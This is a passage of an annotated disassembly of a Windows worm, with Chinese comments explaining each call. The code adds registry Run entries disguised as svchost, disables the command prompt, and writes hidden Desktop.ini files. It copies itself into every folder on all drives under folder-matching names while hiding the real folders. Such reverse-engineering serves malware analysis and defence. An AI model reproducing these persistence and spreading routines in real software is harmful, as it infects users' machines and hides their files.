00401D77 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \添加注册表启动项"svchost1.exe"指向"C:\windows\svchost.exe"
00401D7D |. 3BF4 cmp esi, esp
00401D7F |. E8 3C1E0000 call 00403BC0
00401D84 |. 8D8D D4FDFFFF lea ecx, dword ptr [ebp-22C]
00401D8A |. 51 push ecx
00401D8B |. E8 B01D0000 call 00403B40
00401D90 |. 83C4 04 add esp, 4
00401D93 |. 8BF4 mov esi, esp
00401D95 |. 50 push eax ; /BufSize
00401D96 |. 8D95 D4FDFFFF lea edx, dword ptr [ebp-22C] ; |
00401D9C |. 52 push edx ; |Buffer
00401D9D |. 6A 01 push 1 ; |ValueType = REG_SZ
00401D9F |. 6A 00 push 0 ; |Reserved = 0
00401DA1 |. 68 0CE24200 push 0042E20C ; |ValueName = "svchost2.exe"
00401DA6 |. 8B45 DC mov eax, dword ptr [ebp-24] ; |
00401DA9 |. 50 push eax ; |hKey
00401DAA |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \添加注册表启动项"svchost2.exe"指向"C:\windows\system\svchost.exe"
00401DB0 |. 3BF4 cmp esi, esp
00401DB2 |. E8 091E0000 call 00403BC0
00401DB7 |. 8BF4 mov esi, esp
00401DB9 |. 8B4D DC mov ecx, dword ptr [ebp-24]
00401DBC |. 51 push ecx ; /hKey
00401DBD |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401DC3 |. 3BF4 cmp esi, esp
00401DC5 |. E8 F61D0000 call 00403BC0
00401DCA |. C785 C8FDFFFF>mov dword ptr [ebp-238], 2
00401DD4 |. C785 C4FDFFFF>mov dword ptr [ebp-23C], 0042E1D8 ; ASCII "Software\Policies\Microsoft\Windows\System"
00401DDE |. 8BF4 mov esi, esp
00401DE0 |. 6A 00 push 0 ; /pDisposition = NULL
00401DE2 |. 8D95 CCFDFFFF lea edx, dword ptr [ebp-234] ; |
00401DE8 |. 52 push edx ; |pHandle
00401DE9 |. 6A 00 push 0 ; |pSecurity = NULL
00401DEB |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401DF0 |. 6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00401DF2 |. 68 CCE14200 push 0042E1CC ; |Class = "REG_DWORD"
00401DF7 |. 6A 00 push 0 ; |Reserved = 0
00401DF9 |. 8B85 C4FDFFFF mov eax, dword ptr [ebp-23C] ; |
00401DFF |. 50 push eax ; |Subkey
00401E00 |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00401E05 |. FF15 6C834300 call dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
00401E0B |. 3BF4 cmp esi, esp
00401E0D |. E8 AE1D0000 call 00403BC0
00401E12 |. 8BF4 mov esi, esp
00401E14 |. 6A 04 push 4 ; /BufSize = 4
00401E16 |. 8D8D C8FDFFFF lea ecx, dword ptr [ebp-238] ; |
00401E1C |. 51 push ecx ; |Buffer
00401E1D |. 6A 04 push 4 ; |ValueType = REG_DWORD
00401E1F |. 6A 00 push 0 ; |Reserved = 0
00401E21 |. 68 BCE14200 push 0042E1BC ; |ValueName = "DisableCMD"
00401E26 |. 8B95 CCFDFFFF mov edx, dword ptr [ebp-234] ; |
00401E2C |. 52 push edx ; |hKey
00401E2D |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \创建注册表Software\Policies\Microsoft\Windows\System\DisableCMD:0x00000002禁用cmd
00401E33 |. 3BF4 cmp esi, esp
00401E35 |. E8 861D0000 call 00403BC0
00401E3A |. 8BF4 mov esi, esp
00401E3C |. 8B85 CCFDFFFF mov eax, dword ptr [ebp-234]
00401E42 |. 50 push eax ; /hKey
00401E43 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401E49 |. 3BF4 cmp esi, esp
00401E4B |. E8 701D0000 call 00403BC0
00401E50 |. 5F pop edi
00401E51 |. 5E pop esi
00401E52 |. 5B pop ebx
00401E53 |. 81C4 7C020000 add esp, 27C
00401E59 |. 3BEC cmp ebp, esp
00401E5B |. E8 601D0000 call 00403BC0
00401E60 |. 8BE5 mov esp, ebp
00401E62 |. 5D pop ebp
00401E63 \. C3 retn
004026A0 /> \55 push ebp
004026A1 |. 8BEC mov ebp, esp
004026A3 |. 83EC 40 sub esp, 40
004026A6 |. 53 push ebx
004026A7 |. 56 push esi
004026A8 |. 57 push edi
004026A9 |. 8D7D C0 lea edi, dword ptr [ebp-40]
004026AC |. B9 10000000 mov ecx, 10
004026B1 |. B8 CCCCCCCC mov eax, CCCCCCCC
004026B6 |. F3:AB rep stos dword ptr es:[edi]
004026B8 |. 8BF4 mov esi, esp
004026BA |. 8B45 08 mov eax, dword ptr [ebp+8]
004026BD |. 50 push eax ; /RootPathName
004026BE |. FF15 D4834300 call dword ptr [<&KERNEL32.GetDriveTy>; \获取驱动器类型
004027A0 /> \55 push ebp
004027A1 |. 8BEC mov ebp, esp
004027A3 |. 81EC 84010000 sub esp, 184
004027A9 |. 53 push ebx
004027AA |. 56 push esi
004027AB |. 57 push edi
004027AC |. 8DBD 7CFEFFFF lea edi, dword ptr [ebp-184]
004027B2 |. B9 61000000 mov ecx, 61
004027B7 |. B8 CCCCCCCC mov eax, CCCCCCCC
004027BC |. F3:AB rep stos dword ptr es:[edi]
004027BE |. 8BF4 mov esi, esp
004027C0 |. 8B45 08 mov eax, dword ptr [ebp+8]
004027C3 |. 50 push eax ; /<%s>
004027C4 |. 68 34E54200 push 0042E534 ; |Format = "%s\Desktop.ini"
004027C9 |. 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
004027CF |. 51 push ecx ; |s
004027D0 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
004027D6 |. 83C4 0C add esp, 0C
004027D9 |. 3BF4 cmp esi, esp
004027DB |. E8 E0130000 call 00403BC0
004027E0 |. B9 0C000000 mov ecx, 0C
004027E5 |. BE F4E44200 mov esi, 0042E4F4 ; "[.ShellClassInfo]",LF,"IconFile=Recycle.exe",LF,"IconIndex=0"
004027EA |. 8DBD C0FEFFFF lea edi, dword ptr [ebp-140]
004027F0 |. F3:A5 rep movs dword ptr es:[edi], dword p>
004027F2 |. 66:A5 movs word ptr es:[edi], word ptr [esi>
004027F4 |. A4 movs byte ptr es:[edi], byte ptr [esi>
004027F5 |. C785 F8FEFFFF>mov dword ptr [ebp-108], 33
004027FF |. 8BF4 mov esi, esp
00402801 |. 6A 00 push 0 ; /hTemplateFile = NULL
00402803 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00402805 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402807 |. 6A 00 push 0 ; |pSecurity = NULL
00402809 |. 6A 00 push 0 ; |ShareMode = 0
0040280B |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402810 |. 8D95 FCFEFFFF lea edx, dword ptr [ebp-104] ; |
00402816 |. 52 push edx ; |FileName
00402817 |. FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件c:\windows\Desktop.ini
0040281D |. 3BF4 cmp esi, esp
0040281F |. E8 9C130000 call 00403BC0
00402824 |. 8985 BCFEFFFF mov dword ptr [ebp-144], eax
0040282A |. 8BF4 mov esi, esp
0040282C |. 6A 00 push 0 ; /pOverlapped = NULL
0040282E |. 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C] ; |
00402834 |. 50 push eax ; |pBytesWritten
00402835 |. 8B8D F8FEFFFF mov ecx, dword ptr [ebp-108] ; |
0040283B |. 83E9 01 sub ecx, 1 ; |
0040283E |. 51 push ecx ; |nBytesToWrite
0040283F |. 8D95 C0FEFFFF lea edx, dword ptr [ebp-140] ; |
00402845 |. 52 push edx ; |Buffer
00402846 |. 8B85 BCFEFFFF mov eax, dword ptr [ebp-144] ; |
0040284C |. 50 push eax ; |hFile
0040284D |. FF15 D8834300 call dword ptr [<&KERNEL32.WriteFile>>; \写入文件,内容为[.ShellClassInfo]
IconFile=Recycle.exe
IconIndex=0
00402853 |. 3BF4 cmp esi, esp
00402855 |. E8 66130000 call 00403BC0
0040285A |. 8BF4 mov esi, esp
0040285C |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040285E |. 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
00402864 |. 51 push ecx ; |FileName
00402865 |. FF15 C4834300 call dword ptr [<&KERNEL32.SetFileAtt>; \设置文件为隐藏和系统属性
00401F10 /> \55 push ebp
00401F11 |. 8BEC mov ebp, esp
00401F13 |. 81EC A80C0000 sub esp, 0CA8
00401F19 |. 53 push ebx
00401F1A |. 56 push esi
00401F1B |. 57 push edi
00401F1C |. 8DBD 58F3FFFF lea edi, dword ptr [ebp-CA8]
00401F22 |. B9 2A030000 mov ecx, 32A
00401F27 |. B8 CCCCCCCC mov eax, CCCCCCCC
00401F2C |. F3:AB rep stos dword ptr es:[edi]
00401F2E |. 8BF4 mov esi, esp
00401F30 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401F36 |. 50 push eax ; /Buffer
00401F37 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
00401F3C |. FF15 D0834300 call dword ptr [<&KERNEL32.GetLogical>; \获取逻辑驱动器
00401F42 |. 3BF4 cmp esi, esp
00401F44 |. E8 771C0000 call 00403BC0
00401F49 |. 8985 F4F9FFFF mov dword ptr [ebp-60C], eax
00401F4F |. 8BF4 mov esi, esp
00401F51 |. 8B8D F4F9FFFF mov ecx, dword ptr [ebp-60C]
00401F57 |. 51 push ecx ; /<%d>
00401F58 |. 68 D4E44200 push 0042E4D4 ; |Format = "%d"
00401F5D |. 8D95 F8F9FFFF lea edx, dword ptr [ebp-608] ; |
00401F63 |. 52 push edx ; |s
00401F64 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401F6A |. 83C4 0C add esp, 0C
00401F6D |. 3BF4 cmp esi, esp
00401F6F |. E8 4C1C0000 call 00403BC0
00401F74 |. C785 F0F9FFFF>mov dword ptr [ebp-610], 0
00401F7E |. EB 0F jmp short 00401F8F
00401F80 |> 8B85 F0F9FFFF /mov eax, dword ptr [ebp-610]
00401F86 |. 83C0 04 |add eax, 4
00401F89 |. 8985 F0F9FFFF |mov dword ptr [ebp-610], eax
00401F8F |> 8B8D F0F9FFFF mov ecx, dword ptr [ebp-610]
00401F95 |. 3B8D F4F9FFFF |cmp ecx, dword ptr [ebp-60C]
00401F9B |. 0F84 5C050000 |je 004024FD
00401FA1 |. 8B95 F0F9FFFF |mov edx, dword ptr [ebp-610]
00401FA7 |. 0FBE8415 FEFE>|movsx eax, byte ptr [ebp+edx-102]
00401FAF |. 8BF4 |mov esi, esp
00401FB1 |. 50 |push eax ; /<%c>
00401FB2 |. 8B8D F0F9FFFF |mov ecx, dword ptr [ebp-610] ; |
00401FB8 |. 0FBE940D FDFE>|movsx edx, byte ptr [ebp+ecx-103] ; |
00401FC0 |. 52 |push edx ; |<%c>
00401FC1 |. 8B85 F0F9FFFF |mov eax, dword ptr [ebp-610] ; |
00401FC7 |. 0FBE8C05 FCFE>|movsx ecx, byte ptr [ebp+eax-104] ; |
00401FCF |. 51 |push ecx ; |<%c>
00401FD0 |. 68 CCE44200 |push 0042E4CC ; |Format = "%c%c%c"
00401FD5 |. 8D95 F8FDFFFF |lea edx, dword ptr [ebp-208] ; |
00401FDB |. 52 |push edx ; |s
00401FDC |. FF15 14864300 |call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401FE2 |. 83C4 14 |add esp, 14
00401FE5 |. 3BF4 |cmp esi, esp
00401FE7 |. E8 D41B0000 |call 00403BC0
00401FEC |. 68 C8E44200 |push 0042E4C8 ; ASCII "*.*"
00401FF1 |. 8D85 F8FDFFFF |lea eax, dword ptr [ebp-208]
00401FF7 |. 50 |push eax
00401FF8 |. E8 931C0000 |call 00403C90
00401FFD |. 83C4 08 |add esp, 8
00402000 |. 8BF4 |mov esi, esp
00402002 |. 8D8D B0F8FFFF |lea ecx, dword ptr [ebp-750]
00402008 |. 51 |push ecx ; /pFindFileData
00402009 |. 8D95 F8FDFFFF |lea edx, dword ptr [ebp-208] ; |
0040200F |. 52 |push edx ; |FileName
00402010 |. FF15 CC834300 |call dword ptr [<&KERNEL32.FindFirst>; \搜索所有文件夹
00402016 |. 3BF4 |cmp esi, esp
00402018 |. E8 A31B0000 |call 00403BC0
0040201D |. 8985 ACF8FFFF |mov dword ptr [ebp-754], eax
00402023 |. 83BD ACF8FFFF>|cmp dword ptr [ebp-754], -1
0040202A |. 75 05 |jnz short 00402031
0040202C |.^ E9 4FFFFFFF |jmp 00401F80
00402031 |> C685 FBFDFFFF>|mov byte ptr [ebp-205], 0
00402038 |> 8BF4 |/mov esi, esp
0040203A |. 8D85 B0F8FFFF ||lea eax, dword ptr [ebp-750]
00402040 |. 50 ||push eax ; /pFindFileData
00402041 |. 8B8D ACF8FFFF ||mov ecx, dword ptr [ebp-754] ; |
00402047 |. 51 ||push ecx ; |hFile
00402048 |. FF15 C8834300 ||call dword ptr [<&KERNEL32.FindNext>; \还是搜文件
0040204E |. 3BF4 ||cmp esi, esp
00402050 |. E8 6B1B0000 ||call 00403BC0
00402055 |. 85C0 ||test eax, eax
00402057 |. 0F84 85040000 ||je 004024E2
0040205D |. 8B95 B0F8FFFF ||mov edx, dword ptr [ebp-750]
00402063 |. 83E2 10 ||and edx, 10
00402066 |. 85D2 ||test edx, edx
00402068 |. 0F84 A3030000 ||je 00402411
0040206E |. 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724]
00402074 |. 50 ||push eax
00402075 |. E8 C61A0000 ||call 00403B40
0040207A |. 83C4 04 ||add esp, 4
0040207D |. 83F8 64 ||cmp eax, 64
00402080 |. 0F87 17020000 ||ja 0040229D
00402086 |. 8BF4 ||mov esi, esp
00402088 |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
0040208E |. 51 ||push ecx ; /<%s>
0040208F |. 8D95 F8FDFFFF ||lea edx, dword ptr [ebp-208] ; |
00402095 |. 52 ||push edx ; |<%s>
00402096 |. 68 44E44200 ||push 0042E444 ; |Format = "%s%s AI_Boy.exe"
0040209B |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858] ; |
004020A1 |. 50 ||push eax ; |s
004020A2 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020A8 |. 83C4 10 ||add esp, 10
004020AB |. 3BF4 ||cmp esi, esp
004020AD |. E8 0E1B0000 ||call 00403BC0
004020B2 |. 8BF4 ||mov esi, esp
004020B4 |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
004020BA |. 51 ||push ecx ; /<%s>
004020BB |. 8D95 F8FDFFFF ||lea edx, dword ptr [ebp-208] ; |
004020C1 |. 52 ||push edx ; |<%s>
004020C2 |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004020C7 |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C] ; |
004020CD |. 50 ||push eax ; |s
004020CE |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020D4 |. 83C4 10 ||add esp, 10
004020D7 |. 3BF4 ||cmp esi, esp
004020D9 |. E8 E21A0000 ||call 00403BC0
004020DE |. 8D8D A4F6FFFF ||lea ecx, dword ptr [ebp-95C]
004020E4 |. 51 ||push ecx
004020E5 |. E8 1BEFFFFF ||call 00401005
004020EA |. 83C4 04 ||add esp, 4
004020ED |. 8BF4 ||mov esi, esp
004020EF |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C]
004020F5 |. 52 ||push edx ; /<%s>
004020F6 |. 68 F0E04200 ||push 0042E0F0 ; |Format = "%s.exe AI_Boy...."
004020FB |. 8D85 9CF4FFFF ||lea eax, dword ptr [ebp-B64] ; |
00402101 |. 50 ||push eax ; |s
00402102 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402108 |. 83C4 0C ||add esp, 0C
0040210B |. 3BF4 ||cmp esi, esp
0040210D |. E8 AE1A0000 ||call 00403BC0
00402112 |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64]
00402118 |. 51 ||push ecx
00402119 |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C]
0040211F |. 52 ||push edx
00402120 |. E8 0B1B0000 ||call 00403C30
00402125 |. 83C4 08 ||add esp, 8
00402128 |. 8BF4 ||mov esi, esp
0040212A |. FF15 E0834300 ||call dword ptr [<&KERNEL32.GetLastE>; [GetLastError
00402130 |. 3BF4 ||cmp esi, esp
00402132 |. E8 891A0000 ||call 00403BC0
00402137 |. 85C0 ||test eax, eax
00402139 |. 0F85 AF000000 ||jnz 004021EE
0040213F |. 8BF4 ||mov esi, esp
00402141 |. 8D85 9CF4FFFF ||lea eax, dword ptr [ebp-B64]
00402147 |. 50 ||push eax ; /<%s>
00402148 |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
0040214D |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
00402153 |. 51 ||push ecx ; |s
00402154 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040215A |. 83C4 0C ||add esp, 0C
0040215D |. 3BF4 ||cmp esi, esp
0040215F |. E8 5C1A0000 ||call 00403BC0
00402164 |. 8BF4 ||mov esi, esp
00402166 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402168 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040216E |. 52 ||push edx ; |NewFileName
0040216F |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402174 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \复制文件创建文件夹同名.exe
0040217A |. 3BF4 ||cmp esi, esp
0040217C |. E8 3F1A0000 ||call 00403BC0
00402181 |. 8BF4 ||mov esi, esp
00402183 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402185 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
0040218B |. 50 ||push eax ; |NewFileName
0040218C |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402191 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402197 |. 3BF4 ||cmp esi, esp
00402199 |. E8 221A0000 ||call 00403BC0
0040219E |. 8BF4 ||mov esi, esp
004021A0 |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
004021A5 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858] ; |
004021AB |. 51 ||push ecx ; |FileName
004021AC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021B2 |. 3BF4 ||cmp esi, esp
004021B4 |. E8 071A0000 ||call 00403BC0
004021B9 |. 8BF4 ||mov esi, esp
004021BB |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021BD |. 8D95 9CF4FFFF ||lea edx, dword ptr [ebp-B64] ; |
004021C3 |. 52 ||push edx ; |FileName
004021C4 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \设置文件为隐藏、系统属性
004021CA |. 3BF4 ||cmp esi, esp
004021CC |. E8 EF190000 ||call 00403BC0
004021D1 |. 8BF4 ||mov esi, esp
004021D3 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021D5 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
004021DB |. 50 ||push eax ; |FileName
004021DC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021E2 |. 3BF4 ||cmp esi, esp
004021E4 |. E8 D7190000 ||call 00403BC0
004021E9 |. E9 AA000000 ||jmp 00402298
004021EE |> 8BF4 ||mov esi, esp
004021F0 |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64]
004021F6 |. 51 ||push ecx ; /<%s>
004021F7 |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
004021FC |. 8D95 A0F5FFFF ||lea edx, dword ptr [ebp-A60] ; |
00402202 |. 52 ||push edx ; |s
00402203 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402209 |. 83C4 0C ||add esp, 0C
0040220C |. 3BF4 ||cmp esi, esp
0040220E |. E8 AD190000 ||call 00403BC0
00402213 |. 8BF4 ||mov esi, esp
00402215 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402217 |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858] ; |
0040221D |. 50 ||push eax ; |NewFileName
0040221E |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402223 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402229 |. 3BF4 ||cmp esi, esp
0040222B |. E8 90190000 ||call 00403BC0
00402230 |. 8BF4 ||mov esi, esp
00402232 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402234 |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
0040223A |. 51 ||push ecx ; |NewFileName
0040223B |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402240 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402246 |. 3BF4 ||cmp esi, esp
00402248 |. E8 73190000 ||call 00403BC0
0040224D |. 8BF4 ||mov esi, esp
0040224F |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
00402254 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040225A |. 52 ||push edx ; |FileName
0040225B |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402261 |. 3BF4 ||cmp esi, esp
00402263 |. E8 58190000 ||call 00403BC0
00402268 |. 8BF4 ||mov esi, esp
0040226A |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040226C |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C] ; |
00402272 |. 50 ||push eax ; |FileName
00402273 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402279 |. 3BF4 ||cmp esi, esp
0040227B |. E8 40190000 ||call 00403BC0
00402280 |. 8BF4 ||mov esi, esp
00402282 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
00402284 |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
0040228A |. 51 ||push ecx ; |FileName
0040228B |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402291 |. 3BF4 ||cmp esi, esp
00402293 |. E8 28190000 ||call 00403BC0
00402298 |> E9 6F010000 ||jmp 0040240C
0040229D |> 8BF4 ||mov esi, esp
0040229F |. 8D95 DCF8FFFF ||lea edx, dword ptr [ebp-724]
004022A5 |. 52 ||push edx ; /<%s>
004022A6 |. 8D85 F8FDFFFF ||lea eax, dword ptr [ebp-208] ; |
004022AC |. 50 ||push eax ; |<%s>
004022AD |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004022B2 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858] ; |
004022B8 |. 51 ||push ecx ; |s
004022B9 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022BF |. 83C4 10 ||add esp, 10
004022C2 |. 3BF4 ||cmp esi, esp
004022C4 |. E8 F7180000 ||call 00403BC0
004022C9 |. 8BF4 ||mov esi, esp
004022CB |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
004022D1 |. 52 ||push edx ; /<%s>
004022D2 |. 68 20E44200 ||push 0042E420 ; |Format = "%s."
004022D7 |. 8D85 98F3FFFF ||lea eax, dword ptr [ebp-C68] ; |
004022DD |. 50 ||push eax ; |s
004022DE |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022E4 |. 83C4 0C ||add esp, 0C
004022E7 |. 3BF4 ||cmp esi, esp
004022E9 |. E8 D2180000 ||call 00403BC0
004022EE |. 8D8D 98F3FFFF ||lea ecx, dword ptr [ebp-C68]
004022F4 |. 51 ||push ecx
004022F5 |. E8 0BEDFFFF ||call 00401005
004022FA |. 83C4 04 ||add esp, 4
004022FD |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
00402303 |. 52 ||push edx
00402304 |. E8 37180000 ||call 00403B40
00402309 |. 83C4 04 ||add esp, 4
0040230C |. 83E8 6B ||sub eax, 6B
0040230F |. 50 ||push eax
00402310 |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858]
00402316 |. 50 ||push eax
00402317 |. 8D8D A4F6FFFF ||lea ecx, dword ptr [ebp-95C]
0040231D |. 51 ||push ecx
0040231E |. E8 1D170000 ||call 00403A40
00402323 |. 83C4 0C ||add esp, 0C
00402326 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040232C |. 52 ||push edx
0040232D |. E8 0E180000 ||call 00403B40
00402332 |. 83C4 04 ||add esp, 4
00402335 |. C68405 39F6FF>||mov byte ptr [ebp+eax-9C7], 0
0040233D |. 8BF4 ||mov esi, esp
0040233F |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C]
00402345 |. 50 ||push eax ; /<%s>
00402346 |. 68 A0E34200 ||push 0042E3A0 ; |Format = "%s AI_Boy.exe"
0040234B |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64] ; |
00402351 |. 51 ||push ecx ; |s
00402352 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402358 |. 83C4 0C ||add esp, 0C
0040235B |. 3BF4 ||cmp esi, esp
0040235D |. E8 5E180000 ||call 00403BC0
00402362 |. 8BF4 ||mov esi, esp
00402364 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040236A |. 52 ||push edx ; /<%s>
0040236B |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
00402370 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
00402376 |. 50 ||push eax ; |s
00402377 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040237D |. 83C4 0C ||add esp, 0C
00402380 |. 3BF4 ||cmp esi, esp
00402382 |. E8 39180000 ||call 00403BC0
00402387 |. 8BF4 ||mov esi, esp
00402389 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
0040238B |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64] ; |
00402391 |. 51 ||push ecx ; |NewFileName
00402392 |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402397 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
0040239D |. 3BF4 ||cmp esi, esp
0040239F |. E8 1C180000 ||call 00403BC0
004023A4 |. 8BF4 ||mov esi, esp
004023A6 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
004023A8 |. 8D95 A0F5FFFF ||lea edx, dword ptr [ebp-A60] ; |
004023AE |. 52 ||push edx ; |NewFileName
004023AF |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
004023B4 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
004023BA |. 3BF4 ||cmp esi, esp
004023BC |. E8 FF170000 ||call 00403BC0
004023C1 |. 8BF4 ||mov esi, esp
004023C3 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023C5 |. 8D85 98F3FFFF ||lea eax, dword ptr [ebp-C68] ; |
004023CB |. 50 ||push eax ; |FileName
004023CC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023D2 |. 3BF4 ||cmp esi, esp
004023D4 |. E8 E7170000 ||call 00403BC0
004023D9 |. 8BF4 ||mov esi, esp
004023DB |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023DD |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
004023E3 |. 51 ||push ecx ; |FileName
004023E4 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023EA |. 3BF4 ||cmp esi, esp
004023EC |. E8 CF170000 ||call 00403BC0
004023F1 |. 8BF4 ||mov esi, esp
004023F3 |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
004023F8 |. 8D95 9CF4FFFF ||lea edx, dword ptr [ebp-B64] ; |
004023FE |. 52 ||push edx ; |FileName
004023FF |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402405 |. 3BF4 ||cmp esi, esp
00402407 |. E8 B4170000 ||call 00403BC0
0040240C |> E9 CC000000 ||jmp 004024DD
00402411 |> 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724]
00402417 |. 50 ||push eax
00402418 |. E8 23170000 ||call 00403B40
0040241D |. 83C4 04 ||add esp, 4
00402420 |. 83F8 64 ||cmp eax, 64
00402423 |. 0F87 B4000000 ||ja 004024DD
00402429 |. 8BF4 ||mov esi, esp
0040242B |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
00402431 |. 51 ||push ecx ; /<%s>
00402432 |. 68 9CE34200 ||push 0042E39C ; |Format = "%s"
00402437 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040243D |. 52 ||push edx ; |s
